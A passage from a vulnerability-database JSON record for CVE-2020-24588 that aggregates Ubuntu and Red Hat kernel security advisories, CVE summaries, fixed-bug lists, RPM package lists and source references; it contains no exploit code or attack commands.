packets. (CVE-2020-26145)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation could\nreassemble mixed encrypted and plaintext fragments. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2021-23133)\n\nOr Cohen and Nadav Markus discovered a use-after-free vulnerability in the\nnfc implementation in the Linux kernel. (CVE-2021-23134)\n\nManfred Paul discovered that the extended Berkeley Packet Filter (eBPF)\nimplementation in the Linux kernel contained an out-of-bounds\nvulnerability. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-31440)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly prevent speculative loads in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). An attacker could use this\nissue to possibly execute arbitrary code. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-3506)\n\nMathias Krause discovered that a null pointer dereference existed in the\nNitro Enclaves kernel driver of the Linux kernel. (CVE-2021-3543)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.04:\n  linux-image-5.11.0-1009-kvm     5.11.0-1009.9\n  linux-image-kvm                 5.11.0.1009.9\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-4997-2\n  https://ubuntu.com/security/notices/USN-4997-1\n  CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139,\n  CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133,\n  CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399,\n  CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543,\n  CVE-2021-3609\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9\n\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2021:4356-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:4356\nIssue date:        2021-11-09\nCVE Names:         CVE-2020-0427 CVE-2020-24502 CVE-2020-24503\n                   CVE-2020-24504 CVE-2020-24586 CVE-2020-24587\n                   CVE-2020-24588 CVE-2020-26139 CVE-2020-26140\n                   CVE-2020-26141 CVE-2020-26143 CVE-2020-26144\n                   CVE-2020-26145 CVE-2020-26146 CVE-2020-26147\n                   CVE-2020-27777 CVE-2020-29368 CVE-2020-29660\n                   CVE-2020-36158 CVE-2020-36386 CVE-2021-0129\n                   CVE-2021-3348 CVE-2021-3489 CVE-2021-3564\n                   CVE-2021-3573 CVE-2021-3600 CVE-2021-3635\n                   CVE-2021-3659 CVE-2021-3679 CVE-2021-3732\n                   CVE-2021-20194 CVE-2021-20239 CVE-2021-23133\n                   CVE-2021-28950 CVE-2021-28971 CVE-2021-29155\n                   CVE-2021-29646 CVE-2021-29650 CVE-2021-31440\n                   CVE-2021-31829 CVE-2021-31916 CVE-2021-33200\n====================================================================\n1. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64\n\n3. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427)\n* kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter\ndrivers (CVE-2020-24502)\n* kernel: Insufficient access control in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24503)\n* kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24504)\n* kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586)\n* kernel: Reassembling fragments encrypted under different keys\n(CVE-2020-24587)\n* kernel: wifi frame payload being parsed incorrectly as an L2 frame\n(CVE-2020-24588)\n* kernel: Forwarding EAPOL from unauthenticated wifi client\n(CVE-2020-26139)\n* kernel: accepting plaintext data frames in protected networks\n(CVE-2020-26140)\n* kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141)\n* kernel: accepting fragmented plaintext frames in protected networks\n(CVE-2020-26143)\n* kernel: accepting unencrypted A-MSDU frames that start with RFC1042\nheader (CVE-2020-26144)\n* kernel: accepting plaintext broadcast fragments as full frames\n(CVE-2020-26145)\n* kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n(CVE-2020-27777)\n* kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a\nread-after-free (CVE-2020-29660)\n* kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a\nlong SSID value (CVE-2020-36158)\n* kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt()\n(CVE-2020-36386)\n* kernel: Improper access control in BlueZ may allow information disclosure\nvulnerability. (CVE-2021-0129)\n* kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n(CVE-2021-3348)\n* kernel: Linux kernel eBPF RINGBUF map oversized allocation\n(CVE-2021-3489)\n* kernel: double free in bluetooth subsystem when the HCI device\ninitialization fails (CVE-2021-3564)\n* kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573)\n* kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600)\n* kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679)\n* kernel: Mounting overlayfs inside an unprivileged user namespace can\nreveal files (CVE-2021-3732)\n* kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n(CVE-2021-20194)\n* kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133)\n* kernel: fuse: stall on CPU can occur because a retry loop continually\nfinds the same bad inode (CVE-2021-28950)\n* kernel: System crash in intel_pmu_drain_pebs_nhm in\narch/x86/events/intel/ds.c (CVE-2021-28971)\n* kernel: protection can be bypassed to leak content of kernel memory\n(CVE-2021-29155)\n* kernel: improper input validation in tipc_nl_retrieve_key function in\nnet/tipc/node.c (CVE-2021-29646)\n* kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650)\n* kernel: local escalation of privileges in handling of eBPF programs\n(CVE-2021-31440)\n* kernel: protection of stack pointer against speculative pointer\narithmetic can be bypassed to leak content of kernel memory\n(CVE-2021-31829)\n* kernel: out-of-bounds reads and writes due to enforcing incorrect limits\nfor pointer arithmetic operations by BPF verifier (CVE-2021-33200)\n* kernel: reassembling encrypted fragments with non-consecutive packet\nnumbers (CVE-2020-26146)\n* kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147)\n* kernel: the copy-on-write implementation can grant unintended write\naccess because of a race condition in a THP mapcount check (CVE-2020-29368)\n* kernel: flowtable list del corruption with kernel BUG at\nlib/list_debug.c:50 (CVE-2021-3635)\n* kernel: NULL pointer dereference in llsec_key_alloc() in\nnet/mac802154/llsec.c (CVE-2021-3659)\n* kernel: setsockopt System Call Untrusted Pointer Dereference Information\nDisclosure (CVE-2021-20239)\n* kernel: out of bounds array access in drivers/md/dm-ioctl.c\n(CVE-2021-31916)\n\n4. Solution:\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1509204 - dlm: Add ability to set SO_MARK on DLM sockets\n1793880 - Unreliable RTC synchronization (11-minute mode)\n1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10\n1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check\n1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free\n1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value\n1915825 - Allow falling back to genfscon labeling when the FS doesn\u0027t support xattrs and there is a fs_use_xattr rule for it\n1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. \n1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure\n1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers\n1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers\n1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers\n1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with \u0027serverino\u0027 and \u0027cache=strict \u0027\n1939341 - CNB: net: add inline function skb_csum_is_sctp\n1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode\n1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c\n1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c\n1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS\n1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c\n1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del\n1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory\n1953847 - [ethtool] The `NLM_F_MULTI` should be used for `NLM_F_DUMP`\n1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. \n1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory\n1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation\n1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection\n1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys\n1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame\n1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client\n1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks\n1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames\n1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks\n1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header\n1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames\n1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers\n1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments\n1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h\n1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs\n1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails\n1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. \n1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls\n1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier\n1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl()\n1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c\n1971101 - ceph: potential data corruption in cephfs write_begin codepath\n1972278 - libceph: allow addrvecs with a single NONE/blank address\n1974627 - [TIPC] kernel BUG at lib/list_debug.c:31!\n1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0]\n1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c\n1976679 - blk-mq: fix/improve io scheduler batching dispatch\n1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00\n1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50\n1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116)\n1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame\n1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel\n1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level\n1977850 - geneve virtual devices lack  the NETIF_F_FRAGLIST feature\n1978369 - dm writecache: sync with upstream 5.14\n1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?)\n1979680 - Backport openvswitch tracepoints\n1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod\n1986138 - Lockd invalid cast to nlm_lockowner\n1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty()\n1989999 - ceph omnibus backport for RHEL-8.5.0\n1991976 - block: fix New warning in nvme_setup_discard\n1992700 - blk-mq: fix kernel panic when iterating over flush request\n1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files\n1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\nkernel-4.18.0-348.el8.src.rpm\n\naarch64:\nbpftool-4.18.0-348.el8.aarch64.rpm\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-4.18.0-348.el8.aarch64.rpm\nkernel-core-4.18.0-348.el8.aarch64.rpm\nkernel-cross-headers-4.18.0-348.el8.aarch64.rpm\nkernel-debug-4.18.0-348.el8.aarch64.rpm\nkernel-debug-core-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-devel-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-devel-4.18.0-348.el8.aarch64.rpm\nkernel-headers-4.18.0-348.el8.aarch64.rpm\nkernel-modules-4.18.0-348.el8.aarch64.rpm\nkernel-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-tools-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-4.18.0-348.el8.aarch64.rpm\nperf-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nnoarch:\nkernel-abi-stablelists-4.18.0-348.el8.noarch.rpm\nkernel-doc-4.18.0-348.el8.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-348.el8.ppc64le.rpm\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-4.18.0-348.el8.ppc64le.rpm\nkernel-core-4.18.0-348.el8.ppc64le.rpm\nkernel-cross-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-core-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-4.18.0-348.el8.ppc64le.rpm\nperf-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-348.el8.s390x.rpm\nbpftool-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-4.18.0-348.el8.s390x.rpm\nkernel-core-4.18.0-348.el8.s390x.rpm\nkernel-cross-headers-4.18.0-348.el8.s390x.rpm\nkernel-debug-4.18.0-348.el8.s390x.rpm\nkernel-debug-core-4.18.0-348.el8.s390x.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debug-devel-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm\nkernel-devel-4.18.0-348.el8.s390x.rpm\nkernel-headers-4.18.0-348.el8.s390x.rpm\nkernel-modules-4.18.0-348.el8.s390x.rpm\nkernel-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-tools-4.18.0-348.el8.s390x.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm\nperf-4.18.0-348.el8.s390x.rpm\nperf-debuginfo-4.18.0-348.el8.s390x.rpm\npython3-perf-4.18.0-348.el8.s390x.rpm\npython3-perf-debuginfo-4.18.0-348.el8.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-348.el8.x86_64.rpm\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-4.18.0-348.el8.x86_64.rpm\nkernel-core-4.18.0-348.el8.x86_64.rpm\nkernel-cross-headers-4.18.0-348.el8.x86_64.rpm\nkernel-debug-4.18.0-348.el8.x86_64.rpm\nkernel-debug-core-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-devel-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-devel-4.18.0-348.el8.x86_64.rpm\nkernel-headers-4.18.0-348.el8.x86_64.rpm\nkernel-modules-4.18.0-348.el8.x86_64.rpm\nkernel-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-tools-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-4.18.0-348.el8.x86_64.rpm\nperf-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nRed Hat Enterprise Linux CRB (v. 8):\n\naarch64:\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST\nFrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l\nbobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy\nSfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW\nHgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC\nDRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E\nlJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD\nJhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK\ndQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8\nzf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v\n1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN\n+PuV5cms0sE=2UUA\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1168 - Disable hostname verification in syslog TLS settings\nLOG-1235 - Using HTTPS without a secret does not translate into the correct \u0027scheme\u0027 value in Fluentd\nLOG-1375 - ssl_ca_cert should be optional\nLOG-1378 - CLO should support sasl_plaintext(Password over http)\nLOG-1392 - In fluentd config, flush_interval can\u0027t be set with flush_mode=immediate\nLOG-1494 - Syslog output is serializing json incorrectly\nLOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\nLOG-1575 - Rejected by Elasticsearch and unexpected json-parsing\nLOG-1735 - Regression introducing flush_at_shutdown \nLOG-1774 - The collector logs should  be excluded in fluent.conf\nLOG-1776 - fluentd total_limit_size sets value beyond available space\nLOG-1822 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled\nLOG-1862 - Unsupported kafka parameters when enabled Kafka SASL\nLOG-1903 - Fix the Display of ClusterLogging type in OLM\nLOG-1911 - CLF API changes to Opt-in to multiline error detection\nLOG-1918 - Alert `FluentdNodeDown` always firing \nLOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding\n\n6",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-24588"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006877"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-24588"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-24588",
        "trust": 4.0
      },
      {
        "db": "SIEMENS",
        "id": "SSA-913875",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/05/11/12",
        "trust": 1.7
      },
      {
        "db": "JVN",
        "id": "JVNVU93485736",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006877",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-102-04",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163291",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163249",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2409",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2876",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2509",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3825",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2079",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2290",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.0995",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2249",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.4254",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1587",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2368",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.0845",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3905",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1715",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2136",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2216",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1628",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051814",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051920",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051715",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022041319",
        "trust": 0.6
      },
